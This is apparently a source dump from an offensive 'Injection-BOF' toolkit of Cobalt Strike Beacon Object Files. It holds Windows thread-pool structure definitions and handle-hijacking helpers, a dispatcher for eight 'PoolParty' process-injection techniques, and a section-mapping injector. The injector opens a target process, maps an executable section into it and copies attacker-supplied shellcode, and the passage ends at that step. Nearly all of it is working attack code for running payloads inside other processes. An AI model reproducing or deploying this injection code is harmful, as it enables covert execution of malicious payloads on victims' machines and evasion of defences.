    long Padding_239;
    union _TPP_POOL_QUEUE_STATE QueueState;
    struct _TPP_QUEUE* TaskQueue[3];
    struct _TPP_NUMA_NODE* NumaNode;
    struct _GROUP_AFFINITY* ProximityInfo;
    void* WorkerFactory;
    void* CompletionPort;
    struct _RTL_SRWLOCK Lock;
    struct _LIST_ENTRY PoolObjectList;
    struct _LIST_ENTRY WorkerList;
    struct _TPP_TIMER_QUEUE TimerQueue;
    struct _RTL_SRWLOCK ShutdownLock;
    UINT8 ShutdownInitiated;
    UINT8 Released;
    UINT16 PoolFlags;
    long Padding_240;
    struct _LIST_ENTRY PoolLinks;
    struct _TPP_CALLER AllocCaller;
    struct _TPP_CALLER ReleaseCaller;
    volatile INT32 AvailableWorkerCount;
    volatile INT32 LongRunningWorkerCount;
    UINT32 LastProcCount;
    volatile INT32 NodeStatus;
    volatile INT32 BindingCount;
    UINT32 CallbackChecksDisabled : 1;
    UINT32 TrimTarget : 11;
    UINT32 TrimmedThrdCount : 11;
    UINT32 SelectedCpuSetCount;
    long Padding_241;
    struct _RTL_CONDITION_VARIABLE TrimComplete;
    struct _LIST_ENTRY TrimmedWorkerList;
} FULL_TP_POOL, * PFULL_TP_POOL;

typedef struct _ALPC_WORK_ON_BEHALF_TICKET
{
    UINT32 ThreadId;
    UINT32 ThreadCreationTimeLow;
} ALPC_WORK_ON_BEHALF_TICKET, * PALPC_WORK_ON_BEHALF_TICKET;

typedef union _TPP_WORK_STATE
{
    union
    {
        INT32 Exchange;
        UINT32 Insertable : 1;
        UINT32 PendingCallbackCount : 31;
    };
} TPP_WORK_STATE, * PTPP_WORK_STATE;

typedef struct _TPP_ITE_WAITER
{
    struct _TPP_ITE_WAITER* Next;
    void* ThreadId;
} TPP_ITE_WAITER, * PTPP_ITE_WAITER;

typedef struct _TPP_PH_LINKS
{
    struct _LIST_ENTRY Siblings;
    struct _LIST_ENTRY Children;
    INT64 Key;
} TPP_PH_LINKS, * PTPP_PH_LINKS;

typedef struct _TPP_ITE
{
    struct _TPP_ITE_WAITER* First;
} TPP_ITE, * PTPP_ITE;

typedef union _TPP_FLAGS_COUNT
{
    union
    {
        UINT64 Count : 60;
        UINT64 Flags : 4;
        INT64 Data;
    };
} TPP_FLAGS_COUNT, * PTPP_FLAGS_COUNT;

typedef struct _TPP_BARRIER
{
    volatile union _TPP_FLAGS_COUNT Ptr;
    struct _RTL_SRWLOCK WaitLock;
    struct _TPP_ITE WaitList;
} TPP_BARRIER, * PTPP_BARRIER;

typedef struct _TP_CLEANUP_GROUP
{
    struct _TPP_REFCOUNT Refcount;
    INT32 Released;
    struct _RTL_SRWLOCK MemberLock;
    struct _LIST_ENTRY MemberList;
    struct _TPP_BARRIER Barrier;
    struct _RTL_SRWLOCK CleanupLock;
    struct _LIST_ENTRY CleanupList;
} TP_CLEANUP_GROUP, * PTP_CLEANUP_GROUP;


typedef struct _TPP_CLEANUP_GROUP_MEMBER
{
    struct _TPP_REFCOUNT Refcount;
    long Padding_233;
    const struct _TPP_CLEANUP_GROUP_MEMBER_VFUNCS* VFuncs;
    struct _TP_CLEANUP_GROUP* CleanupGroup;
    void* CleanupGroupCancelCallback;
    void* FinalizationCallback;
    struct _LIST_ENTRY CleanupGroupMemberLinks;
    struct _TPP_BARRIER CallbackBarrier;
    union
    {
        void* Callback;
        void* WorkCallback;
        void* SimpleCallback;
        void* TimerCallback;
        void* WaitCallback;
        void* IoCallback;
        void* AlpcCallback;
        void* AlpcCallbackEx;
        void* JobCallback;
    };
    void* Context;
    struct _ACTIVATION_CONTEXT* ActivationContext;
    void* SubProcessTag;
    struct _GUID ActivityId;
    struct _ALPC_WORK_ON_BEHALF_TICKET WorkOnBehalfTicket;
    void* RaceDll;
    FULL_TP_POOL* Pool;
    struct _LIST_ENTRY PoolObjectLinks;
    union
    {
        volatile INT32 Flags;
        UINT32 LongFunction : 1;
        UINT32 Persistent : 1;
        UINT32 UnusedPublic : 14;
        UINT32 Released : 1;
        UINT32 CleanupGroupReleased : 1;
        UINT32 InCleanupGroupCleanupList : 1;
        UINT32 UnusedPrivate : 13;
    };
    long Padding_234;
    struct _TPP_CALLER AllocCaller;
    struct _TPP_CALLER ReleaseCaller;
    enum _TP_CALLBACK_PRIORITY CallbackPriority;
    INT32 __PADDING__[1];
} TPP_CLEANUP_GROUP_MEMBER, * PTPP_CLEANUP_GROUP_MEMBER;

typedef struct _FULL_TP_WORK
{
    struct _TPP_CLEANUP_GROUP_MEMBER CleanupGroupMember;
    struct _TP_TASK Task;
    volatile union _TPP_WORK_STATE WorkState;
    INT32 __PADDING__[1];
} FULL_TP_WORK, * PFULL_TP_WORK;

typedef struct _FULL_TP_TIMER
{
    struct _FULL_TP_WORK Work;
    struct _RTL_SRWLOCK Lock;
    union
    {
        struct _TPP_PH_LINKS WindowEndLinks;
        struct _LIST_ENTRY ExpirationLinks;
    };
    struct _TPP_PH_LINKS WindowStartLinks;
    INT64 DueTime;
    struct _TPP_ITE Ite;
    UINT32 Window;
    UINT32 Period;
    UINT8 Inserted;
    UINT8 WaitTimer;
    union
    {
        UINT8 TimerStatus;
        UINT8 InQueue : 1;
        UINT8 Absolute : 1;
        UINT8 Cancelled : 1;
    };
    UINT8 BlockInsert;
    INT32 __PADDING__[1];
} FULL_TP_TIMER, * PFULL_TP_TIMER;

typedef struct _FULL_TP_WAIT
{
    struct _FULL_TP_TIMER Timer;
    void* Handle;
    void* WaitPkt;
    void* NextWaitHandle;
    union _LARGE_INTEGER NextWaitTimeout;
    struct _TP_DIRECT Direct;
    union
    {
        union
        {
            UINT8 AllFlags;
            UINT8 NextWaitActive : 1;
            UINT8 NextTimeoutActive : 1;
            UINT8 CallbackCounted : 1;
            UINT8 Spare : 5;
        };
    } WaitFlags;
    char __PADDING__[7];
} FULL_TP_WAIT, * PFULL_TP_WAIT;

typedef struct _FULL_TP_IO
{
    struct _TPP_CLEANUP_GROUP_MEMBER CleanupGroupMember;
    struct _TP_DIRECT Direct;
    void* File;
    volatile INT32 PendingIrpCount;
    INT32 __PADDING__[1];
} FULL_TP_IO, * PFULL_TP_IO;

typedef struct _FULL_TP_ALPC
{
    struct _TP_DIRECT Direct;
    struct _TPP_CLEANUP_GROUP_MEMBER CleanupGroupMember;
    void* AlpcPort;
    INT32 DeferredSendCount;
    INT32 LastConcurrencyCount;
    union
    {
        UINT32 Flags;
        UINT32 ExTypeCallback : 1;
        UINT32 CompletionListRegistered : 1;
        UINT32 Reserved : 30;
    };
    INT32 __PADDING__[1];
} FULL_TP_ALPC, * PFULL_TP_ALPC;

typedef struct _T2_SET_PARAMETERS_V0
{
    ULONG Version;
    ULONG Reserved;
    LONGLONG NoWakeTolerance;
} T2_SET_PARAMETERS, * PT2_SET_PARAMETERS;


typedef struct _PROCESS_HANDLE_TABLE_ENTRY_INFO
{
    HANDLE HandleValue;
    ULONG_PTR HandleCount;
    ULONG_PTR PointerCount;
    ACCESS_MASK GrantedAccess;
    ULONG ObjectTypeIndex;
    ULONG HandleAttributes;
    ULONG Reserved;
} PROCESS_HANDLE_TABLE_ENTRY_INFO, * PPROCESS_HANDLE_TABLE_ENTRY_INFO;

typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION
{
    ULONG_PTR NumberOfHandles;
    ULONG_PTR Reserved;
    PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[ANYSIZE_ARRAY];
} PROCESS_HANDLE_SNAPSHOT_INFORMATION, * PPROCESS_HANDLE_SNAPSHOT_INFORMATION;

typedef enum
{
    ProcessHandleInformation = 51
} PROCESS_INFOCLASS;


typedef struct _WORKER_FACTORY_BASIC_INFORMATION
{
    LARGE_INTEGER Timeout;
    LARGE_INTEGER RetryTimeout;
    LARGE_INTEGER IdleTimeout;
    BOOLEAN Paused;
    BOOLEAN TimerSet;
    BOOLEAN QueuedToExWorker;
    BOOLEAN MayCreate;
    BOOLEAN CreateInProgress;
    BOOLEAN InsertedIntoQueue;
    BOOLEAN Shutdown;
    ULONG BindingCount;
    ULONG ThreadMinimum;
    ULONG ThreadMaximum;
    ULONG PendingWorkerCount;
    ULONG WaitingWorkerCount;
    ULONG TotalWorkerCount;
    ULONG ReleaseCount;
    LONGLONG InfiniteWaitGoal;
    PVOID StartRoutine;
    PVOID StartParameter;
    HANDLE ProcessId;
    SIZE_T StackReserve;
    SIZE_T StackCommit;
    NTSTATUS LastThreadCreationStatus;
} WORKER_FACTORY_BASIC_INFORMATION, * PWORKER_FACTORY_BASIC_INFORMATION;


typedef NTSTATUS(NTAPI* _NtSetTimer2)(
    HANDLE TimerHandle,
    PLARGE_INTEGER DueTime,
    PLARGE_INTEGER Period,
    PT2_SET_PARAMETERS Parameters
    );

typedef NTSTATUS(NTAPI* _NtQueryInformationProcess)(
    IN HANDLE ProcessHandle,
    IN PROCESSINFOCLASS ProcessInformationClass,
    OUT PVOID ProcessInformation,
    IN ULONG ProcessInformationLength,
    OUT PULONG ReturnLength OPTIONAL
    );


typedef NTSTATUS(NTAPI* _NtQueryObject)(
    HANDLE Handle,
    OBJECT_INFORMATION_CLASS ObjectInformationClass,
    PVOID ObjectInformation,
    ULONG ObjectInformationLength,
    PULONG ReturnLength
    );

typedef enum _QUERY_WORKERFACTORYINFOCLASS
{
    WorkerFactoryBasicInformation = 7,
} QUERY_WORKERFACTORYINFOCLASS, * PQUERY_WORKERFACTORYINFOCLASS;

typedef NTSTATUS(NTAPI* _NtQueryInformationWorkerFactory)(
    HANDLE WorkerFactoryHandle,
    QUERY_WORKERFACTORYINFOCLASS WorkerFactoryInformationClass,
    PVOID WorkerFactoryInformation,
    ULONG WorkerFactoryInformationLength,
    PULONG ReturnLength
    );

typedef NTSTATUS(NTAPI* _ZwSetIoCompletion)(
    HANDLE IoCompletionHandle,
    PVOID KeyContext,
    PVOID ApcContext,
    NTSTATUS IoStatus,
    ULONG_PTR IoStatusInformation
    );

typedef struct _FULL_TP_JOB
{
    struct _TP_DIRECT Direct;
    struct _TPP_CLEANUP_GROUP_MEMBER CleanupGroupMember;
    void* JobHandle;
    union
    {
        volatile int64_t CompletionState;
        int64_t Rundown : 1;
        int64_t CompletionCount : 63;
    };
    struct _RTL_SRWLOCK RundownLock;
} FULL_TP_JOB, * PFULL_TP_JOB;

typedef NTSTATUS(NTAPI* _TpAllocJobNotification)(
    PFULL_TP_JOB* JobReturn,
    HANDLE HJob,
    PVOID Callback,
    PVOID Context,
    PTP_CALLBACK_ENVIRON CallbackEnviron
    );

typedef NTSTATUS(NTAPI* _NtWriteVirtualMemory) (
    HANDLE ProcessHandle,
    PVOID BaseAddress,
    PVOID Buffer,
    SIZE_T BytesToWrite,
    PSIZE_T BytesWritten
    );

typedef struct _ALPC_PORT_ATTRIBUTES
{
    ULONG Flags;
    SECURITY_QUALITY_OF_SERVICE SecurityQos;
    SIZE_T MaxMessageLength;
    SIZE_T MemoryBandwidth;
    SIZE_T MaxPoolUsage;
    SIZE_T MaxSectionSize;
    SIZE_T MaxViewSize;
    SIZE_T MaxTotalSectionSize;
    ULONG DupObjectTypes;
#ifdef _WIN64
    ULONG Reserved;
#endif
} ALPC_PORT_ATTRIBUTES, * PALPC_PORT_ATTRIBUTES;


typedef NTSTATUS(NTAPI* _NtAlpcCreatePort)(
    PHANDLE PortHandle,
    POBJECT_ATTRIBUTES ObjectAttributes,
    PALPC_PORT_ATTRIBUTES PortAttributes
    );

typedef struct _TP_ALPC TP_ALPC, * PTP_ALPC;

typedef VOID(NTAPI* PTP_ALPC_CALLBACK)(
    PTP_CALLBACK_INSTANCE Instance,
    PVOID Context,
    PTP_ALPC Alpc
    );

typedef NTSTATUS(NTAPI* _TpAllocAlpcCompletion)(
    PFULL_TP_ALPC* AlpcReturn,
    HANDLE AlpcPort,
    PTP_ALPC_CALLBACK Callback,
    PVOID Context,
    PTP_CALLBACK_ENVIRON CallbackEnviron
    );

typedef struct _ALPC_PORT_ASSOCIATE_COMPLETION_PORT
{
    PVOID CompletionKey;
    HANDLE CompletionPort;
} ALPC_PORT_ASSOCIATE_COMPLETION_PORT, * PALPC_PORT_ASSOCIATE_COMPLETION_PORT;

// private
typedef enum _ALPC_PORT_INFORMATION_CLASS
{
    AlpcBasicInformation, // q: out ALPC_BASIC_INFORMATION
    AlpcPortInformation, // s: in ALPC_PORT_ATTRIBUTES
    AlpcAssociateCompletionPortInformation, // s: in ALPC_PORT_ASSOCIATE_COMPLETION_PORT
    AlpcConnectedSIDInformation, // q: in SID
    AlpcServerInformation, // q: inout ALPC_SERVER_INFORMATION
    AlpcMessageZoneInformation, // s: in ALPC_PORT_MESSAGE_ZONE_INFORMATION
    AlpcRegisterCompletionListInformation, // s: in ALPC_PORT_COMPLETION_LIST_INFORMATION
    AlpcUnregisterCompletionListInformation, // s: VOID
    AlpcAdjustCompletionListConcurrencyCountInformation, // s: in ULONG
    AlpcRegisterCallbackInformation, // s: ALPC_REGISTER_CALLBACK // kernel-mode only
    AlpcCompletionListRundownInformation, // s: VOID // 10
    AlpcWaitForPortReferences,
    AlpcServerSessionInformation // q: ALPC_SERVER_SESSION_INFORMATION // since 19H2
} ALPC_PORT_INFORMATION_CLASS;


typedef NTSTATUS(NTAPI* _NtAlpcSetInformation)(
    HANDLE PortHandle,
    ALPC_PORT_INFORMATION_CLASS PortInformationClass,
    PVOID PortInformation,
    ULONG Length
    );

typedef struct _PORT_MESSAGE
{
    union
    {
        struct
        {
            USHORT DataLength;
            USHORT TotalLength;
        } s1;
        ULONG Length;
    } u1;
    union
    {
        struct
        {
            USHORT Type;
            USHORT DataInfoOffset;
        } s2;
        ULONG ZeroInit;
    } u2;
    union
    {
        CLIENT_ID ClientId;
        double DoNotUseThisField;
    };
    ULONG MessageId;
    union
    {
        SIZE_T ClientViewSize; // only valid for LPC_CONNECTION_REQUEST messages
        ULONG CallbackId; // only valid for LPC_REQUEST messages
    };
} PORT_MESSAGE, * PPORT_MESSAGE;
typedef struct _ALPC_MESSAGE {
    PORT_MESSAGE PortHeader;
    BYTE PortMessage[1000];
} ALPC_MESSAGE, * PALPC_MESSAGE;

typedef struct _ALPC_MESSAGE_ATTRIBUTES
{
    ULONG AllocatedAttributes;
    ULONG ValidAttributes;
} ALPC_MESSAGE_ATTRIBUTES, * PALPC_MESSAGE_ATTRIBUTES;

typedef NTSTATUS(NTAPI* _NtAlpcConnectPort)(
    PHANDLE PortHandle,
    PUNICODE_STRING PortName,
    POBJECT_ATTRIBUTES ObjectAttributes,
    PALPC_PORT_ATTRIBUTES PortAttributes,
    ULONG Flags,
    PSID RequiredServerSid,
    PPORT_MESSAGE ConnectionMessage,
    PSIZE_T BufferLength,
    PALPC_MESSAGE_ATTRIBUTES OutMessageAttributes,
    PALPC_MESSAGE_ATTRIBUTES InMessageAttributes,
    PLARGE_INTEGER Timeout
    );

typedef struct _FILE_COMPLETION_INFORMATION
{
    HANDLE Port;
    PVOID Key;
} FILE_COMPLETION_INFORMATION, * PFILE_COMPLETION_INFORMATION;

typedef enum _EXTENDED_FILE_INFORMATION_CLASS {
    r_FileDirectoryInformation = 1,
    r_FileFullDirectoryInformation,
    r_FileBothDirectoryInformation,
    r_FileBasicInformation,
    r_FileStandardInformation,
    r_FileInternalInformation,
    r_FileEaInformation,
    r_FileAccessInformation,
    r_FileNameInformation,
    r_FileRenameInformation,
    r_FileLinkInformation,
    r_FileNamesInformation,
    r_FileDispositionInformation,
    r_FilePositionInformation,
    r_FileFullEaInformation,
    r_FileModeInformation,
    r_FileAlignmentInformation,
    r_FileAllInformation,
    r_FileAllocationInformation,
    r_FileEndOfFileInformation,
    r_FileAlternateNameInformation,
    r_FileStreamInformation,
    r_FilePipeInformation,
    r_FilePipeLocalInformation,
    r_FilePipeRemoteInformation,
    r_FileMailslotQueryInformation,
    r_FileMailslotSetInformation,
    r_FileCompressionInformation,
    r_FileObjectIdInformation,
    r_FileCompletionInformation,
    r_FileMoveClusterInformation,
    r_FileQuotaInformation,
    r_FileReparsePointInformation,
    r_FileNetworkOpenInformation,
    r_FileAttributeTagInformation,
    r_FileTrackingInformation,
    r_FileIdBothDirectoryInformation,
    r_FileIdFullDirectoryInformation,
    r_FileValidDataLengthInformation,
    r_FileShortNameInformation,
    r_FileIoCompletionNotificationInformation,
    r_FileIoStatusBlockRangeInformation,
    r_FileIoPriorityHintInformation,
    r_FileSfioReserveInformation,
    r_FileSfioVolumeInformation,
    r_FileHardLinkInformation,
    r_FileProcessIdsUsingFileInformation,
    r_FileNormalizedNameInformation,
    r_FileNetworkPhysicalNameInformation,
    r_FileIdGlobalTxDirectoryInformation,
    r_FileIsRemoteDeviceInformation,
    r_FileUnusedInformation,
    r_FileNumaNodeInformation,
    r_FileStandardLinkInformation,
    r_FileRemoteProtocolInformation,
    r_FileRenameInformationBypassAccessCheck,
    r_FileLinkInformationBypassAccessCheck,
    r_FileVolumeNameInformation,
    r_FileIdInformation,
    r_FileIdExtdDirectoryInformation,
    r_FileReplaceCompletionInformation,
    r_FileHardLinkFullIdInformation,
    r_FileIdExtdBothDirectoryInformation,
    r_FileDispositionInformationEx,
    r_FileRenameInformationEx,
    r_FileRenameInformationExBypassAccessCheck,
    r_FileDesiredStorageClassInformation,
    r_FileStatInformation,
    r_FileMemoryPartitionInformation,
    r_FileStatLxInformation,
    r_FileCaseSensitiveInformation,
    r_FileLinkInformationEx,
    r_FileLinkInformationExBypassAccessCheck,
    r_FileStorageReserveIdInformation,
    r_FileCaseSensitiveInformationForceAccessCheck,
    r_FileKnownFolderInformation,
    r_FileStatBasicInformation,
    r_FileId64ExtdDirectoryInformation,
    r_FileId64ExtdBothDirectoryInformation,
    r_FileIdAllExtdDirectoryInformation,
    r_FileIdAllExtdBothDirectoryInformation,
    r_FileMaximumInformation
 } EXTENDED_FILE_INFORMATION_CLASS, *PEXTENDED_FILE_INFORMATION_CLASS;

typedef NTSTATUS(NTAPI* _NtSetInformationFile)(
    HANDLE FileHandle,
    PIO_STATUS_BLOCK IoStatusBlock,
    PVOID FileInformation,
    ULONG Length,
    FILE_INFORMATION_CLASS FileInformationClass
    );

BYTE* NtQueryObject_(HANDLE x, OBJECT_INFORMATION_CLASS y) {
    _NtQueryObject NtQueryObject = (_NtQueryObject)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryObject"));
    ULONG InformationLength = 0;
    NTSTATUS Ntstatus = STATUS_INFO_LENGTH_MISMATCH;
    BYTE* Information = NULL;

    do {
        Information = (BYTE*)MSVCRT$realloc(Information, InformationLength);
        Ntstatus = NtQueryObject(x, y, Information, InformationLength, &InformationLength);
    } while (STATUS_INFO_LENGTH_MISMATCH == Ntstatus);

    return Information;
}

typedef enum _SET_WORKERFACTORYINFOCLASS
{
    WorkerFactoryTimeout = 0,
    WorkerFactoryRetryTimeout = 1,
    WorkerFactoryIdleTimeout = 2,
    WorkerFactoryBindingCount = 3,
    WorkerFactoryThreadMinimum = 4,
    WorkerFactoryThreadMaximum = 5,
    WorkerFactoryPaused = 6,
    WorkerFactoryAdjustThreadGoal = 8,
    WorkerFactoryCallbackType = 9,
    WorkerFactoryStackInformation = 10,
    WorkerFactoryThreadBasePriority = 11,
    WorkerFactoryTimeoutWaiters = 12,
    WorkerFactoryFlags = 13,
    WorkerFactoryThreadSoftMaximum = 14,
    WorkerFactoryMaxInfoClass = 15 /* Not implemented */
} SET_WORKERFACTORYINFOCLASS, * PSET_WORKERFACTORYINFOCLASS;

typedef NTSTATUS(NTAPI* _NtSetInformationWorkerFactory)(
    HANDLE hTpWorkerFactory,
    SET_WORKERFACTORYINFOCLASS WorkerFactoryInformationClass,
    PVOID WorkerFactoryInformation,
    ULONG WorkerFactoryInformationLength
    );

typedef NTSTATUS(NTAPI* _ZwAssociateWaitCompletionPacket)(
    HANDLE WaitCopmletionPacketHandle,
    HANDLE IoCompletionHandle,
    HANDLE TargetObjectHandle,
    PVOID KeyContext,
    PVOID ApcContext,
    NTSTATUS IoStatus,
    ULONG_PTR IoStatusInformation,
    PBOOLEAN AlreadySignaled
    );

// ----------------------------------------------------------------------------------------------------

// Functions

HANDLE hIoCompletion = NULL;
HANDLE hTpWorkerFactory = NULL;
HANDLE hIRTimer = NULL;

HANDLE HijackProcessHandle(PWSTR wsObjectType, HANDLE p_hTarget, DWORD dwDesiredAccess) {
    _NtQueryInformationProcess NtQueryInformationProcess = (_NtQueryInformationProcess)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess"));

    BYTE* Information = NULL;
    ULONG InformationLength = 0;
    NTSTATUS Ntstatus = STATUS_INFO_LENGTH_MISMATCH;

    do {
        Information = (BYTE*)MSVCRT$realloc(Information, InformationLength);
        Ntstatus = NtQueryInformationProcess(p_hTarget, (PROCESSINFOCLASS)(ProcessHandleInformation), Information, InformationLength, &InformationLength);
    } while (STATUS_INFO_LENGTH_MISMATCH == Ntstatus);


    PPROCESS_HANDLE_SNAPSHOT_INFORMATION pProcessHandleInformation = (PPROCESS_HANDLE_SNAPSHOT_INFORMATION)(Information);

    HANDLE p_hDuplicatedObject;
    ULONG InformationLength_ = 0;

    for (int i = 0; i < pProcessHandleInformation->NumberOfHandles; i++) {
        KERNEL32$DuplicateHandle(
            p_hTarget,
            pProcessHandleInformation->Handles[i].HandleValue,
            KERNEL32$GetCurrentProcess(),
            &p_hDuplicatedObject,
            dwDesiredAccess,
            FALSE,
            (DWORD_PTR)NULL);

        BYTE* pObjectInformation;
        pObjectInformation = NtQueryObject_(p_hDuplicatedObject, ObjectTypeInformation);
        PPUBLIC_OBJECT_TYPE_INFORMATION pObjectTypeInformation = (PPUBLIC_OBJECT_TYPE_INFORMATION)(pObjectInformation);

        if (MSVCRT$wcscmp(wsObjectType, pObjectTypeInformation->TypeName.Buffer) != 0) {
            continue;
        }

        return p_hDuplicatedObject;
    }
}

HANDLE HijackTargetThreadPoolHandle(PWSTR wsObjectType, HANDLE processHandle, DWORD dwDesiredAccess) {
    return HijackProcessHandle(wsObjectType, processHandle, dwDesiredAccess);
}

HANDLE GetTargetThreadPoolHandle(PWSTR wsObjectType, HANDLE processHandle, DWORD dwDesiredAccess) {
    HANDLE hTargetThreadPoolHandle = HijackTargetThreadPoolHandle(wsObjectType, processHandle, dwDesiredAccess);
    return hTargetThreadPoolHandle;
}

void HijackIoCompletionHandle(HANDLE processHandle, DWORD dwDesiredAccess) {
    hIoCompletion = GetTargetThreadPoolHandle((PWSTR)L"IoCompletion\0", processHandle, dwDesiredAccess);
}

void HijackTpWorkerFactoryHandle(HANDLE processHandle, DWORD dwDesiredAccess) {
    hTpWorkerFactory = GetTargetThreadPoolHandle((PWSTR)L"TpWorkerFactory\0", processHandle, dwDesiredAccess);
}

void HijackIRTimerHandle(HANDLE processHandle, DWORD dwDesiredAccess) {
    hIRTimer = GetTargetThreadPoolHandle((PWSTR)L"IRTimer\0", processHandle, dwDesiredAccess);
}

WORKER_FACTORY_BASIC_INFORMATION GetWorkerFactoryBasicInformation() {
    WORKER_FACTORY_BASIC_INFORMATION WorkerFactoryInformation = { 0 };
    _NtQueryInformationWorkerFactory NtQueryInformationWorkerFactory = (_NtQueryInformationWorkerFactory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryInformationWorkerFactory"));
    NtQueryInformationWorkerFactory(hTpWorkerFactory, WorkerFactoryBasicInformation, &WorkerFactoryInformation, sizeof(WorkerFactoryInformation), NULL);
    return WorkerFactoryInformation;
}

void RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString)
{
    if (!DestinationString) return;

    if (!SourceString) {
        DestinationString->Length = 0;
        DestinationString->MaximumLength = 0;
        DestinationString->Buffer = NULL;
        return;
    }

    /* Compute character length, then clamp so (len+1)*sizeof(WCHAR) fits in USHORT */
    size_t cch = MSVCRT$wcslen(SourceString);

    /* Max WCHAR count that allows room for the NUL in USHORT bytes */
    size_t max_cch_with_nul = (USHRT_MAX / sizeof(wchar_t));
    if (max_cch_with_nul > 0) {
        size_t max_cch = max_cch_with_nul - 1; /* leave space for the terminator */
        if (cch > max_cch) cch = max_cch;
    }

    /* Set fields (Length/MaximumLength are in BYTES) */
    DestinationString->Length = (unsigned short)(cch * sizeof(wchar_t));
    DestinationString->MaximumLength = (unsigned short)((cch + 1) * sizeof(wchar_t));

    /* Official RtlInitUnicodeString stores the caller's pointer (no copy). */
    DestinationString->Buffer = (PWSTR)SourceString; /* cast matches real API */
}

char generateRandomLetter() {
    int randomNumber = MSVCRT$rand() % 26;
    char randomLetter = 'A' + randomNumber;
    return randomLetter;
}

char generateRandomLetters(int length) {
    char* randomLetters = (char*)MSVCRT$malloc((length + 1) * sizeof(char));
    for (int i = 0; i < length; ++i) {
        randomLetters[i] = generateRandomLetter();
    }
    randomLetters[length] = '\0';
    return randomLetters;
}

wchar_t generateRandomLetterW() {
    return L'A' + MSVCRT$rand() % 26;
}

wchar_t* generateRandomLettersW(int length) {
    wchar_t* randomLetters = (wchar_t*)MSVCRT$malloc((length + 1) * sizeof(wchar_t));
    for (int i = 0; i < length; ++i) {
        randomLetters[i] = generateRandomLetterW();
    }
    randomLetters[length] = L'\0';
    return randomLetters;
}

// ----------------------------------------------------------------------------------------------------


================================================
FILE: Injection-BOF/inject_poolparty/inject_poolparty.c
================================================
#include "1.h"
#include "2.h"
#include "3.h"
#include "4.h"
#include "5.h"
#include "6.h"
#include "7.h"
#include "8.h"

void go(char * args, int len) {
    datap parser;
    BeaconDataParse(&parser, args, len);

    DWORD pid = BeaconDataInt(&parser);
    SIZE_T shellcodeSize = NULL;
    CHAR* shellcode = BeaconDataExtract(&parser, &shellcodeSize);
    DWORD technique = BeaconDataInt(&parser);

    BeaconPrintf(CALLBACK_OUTPUT, "Selected technique: %d", technique);

    switch(technique) {
        case 1: Inject1(pid, shellcode, shellcodeSize); break;
        case 2: Inject2(pid, shellcode, shellcodeSize); break;
        case 3: Inject3(pid, shellcode, shellcodeSize); break;
        case 4: Inject4(pid, shellcode, shellcodeSize); break;
        case 5: Inject5(pid, shellcode, shellcodeSize); break;
        case 6: Inject6(pid, shellcode, shellcodeSize); break;
        case 7: Inject7(pid, shellcode, shellcodeSize); break;
        case 8: Inject8(pid, shellcode, shellcodeSize); break;
        default: BeaconPrintf(CALLBACK_OUTPUT, "Invalid technique %d", technique);
    }
}

================================================
FILE: Injection-BOF/inject_sec/inject_sec.c
================================================
#include <stdio.h>
#include <windows.h>
#include "beacon.h"
#include "libc.h"

#define NT_SUCCESS 0x00000000

WINBASEAPI   HANDLE   WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
NTSYSCALLAPI NTSTATUS WINAPI NTDLL$NtCreateSection(PHANDLE SectionHandle, ACCESS_MASK DesiredAccess, PVOID ObjectAttributes, PLARGE_INTEGER MaximumSize, ULONG SectionPageProtection, ULONG AllocationAttributes, HANDLE FileHandle);
NTSYSAPI     NTSTATUS WINAPI NTDLL$NtMapViewOfSection(HANDLE, HANDLE, PVOID, ULONG, SIZE_T, PLARGE_INTEGER, PSIZE_T, UINT, ULONG, ULONG);
NTSYSAPI     NTSTATUS WINAPI NTDLL$NtUnmapViewOfSection(HANDLE, PVOID);
NTSYSCALLAPI NTSTATUS WINAPI NTDLL$NtClose(HANDLE);
WINBASEAPI   HANDLE   WINAPI KERNEL32$CreateRemoteThread(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
WINBASEAPI   HANDLE   WINAPI KERNEL32$GetCurrentProcess(void);
WINBASEAPI   ULONG    NTAPI  NTDLL$RtlNtStatusToDosError( NTSTATUS Status );
WINBASEAPI   DWORD    WINAPI KERNEL32$GetLastError(VOID);

void go(char * args, int len) {
    datap parser;
    BeaconDataParse(&parser, args, len);

    DWORD procID = BeaconDataInt(&parser);
    SIZE_T shellcodeSize = NULL;
    CHAR* shellcode = BeaconDataExtract(&parser, &shellcodeSize);

    BeaconPrintf(CALLBACK_OUTPUT, "Size: %d", shellcodeSize);

    HANDLE hSection = NULL;
    HANDLE baseAddrRemote = NULL;
    HANDLE baseAddrLocal = NULL;

    LARGE_INTEGER sectionSize = { shellcodeSize };

    HANDLE hLocalProcess  = KERNEL32$GetCurrentProcess();
    HANDLE hRemoteProcess = KERNEL32$OpenProcess(PROCESS_ALL_ACCESS, FALSE, procID);

    // Create RWX memory section
    NTSTATUS NtStatus = NTDLL$NtCreateSection(&hSection, GENERIC_ALL, NULL, (PLARGE_INTEGER)&sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
    if(NtStatus != NT_SUCCESS) {
        ULONG error = NTDLL$RtlNtStatusToDosError(NtStatus);
        BeaconPrintf(CALLBACK_ERROR, "Error creating RWX memory section. Error: %d\n", error);
        return;
    }

    // Map RW Section of Local Process
    NtStatus = NTDLL$NtMapViewOfSection(hSection, hLocalProcess, &baseAddrLocal, NULL, 0,  NULL, &shellcodeSize, 2, 0, PAGE_READWRITE);
    if(NtStatus != NT_SUCCESS) {
        ULONG error = NTDLL$RtlNtStatusToDosError(NtStatus);
        BeaconPrintf(CALLBACK_ERROR, "Error mapping local process. Error: %d\n", error);
        return;
    }

    // Map view of same section for remote process
    NtStatus = NTDLL$NtMapViewOfSection(hSection, hRemoteProcess, &baseAddrRemote, NULL, 0, NULL, &shellcodeSize, 2, 0, PAGE_EXECUTE_READ);
    if(NtStatus != NT_SUCCESS) {
        ULONG error = NTDLL$RtlNtStatusToDosError(NtStatus);
        BeaconPrintf(CALLBACK_ERROR, "Error mapping remote process. Error: %d\n", error);
        return;
    }

    // Copy buffer to mapped local process
    mycopy(baseAddrLocal, shellcode, shellcodeSize);

    // Unmap local view
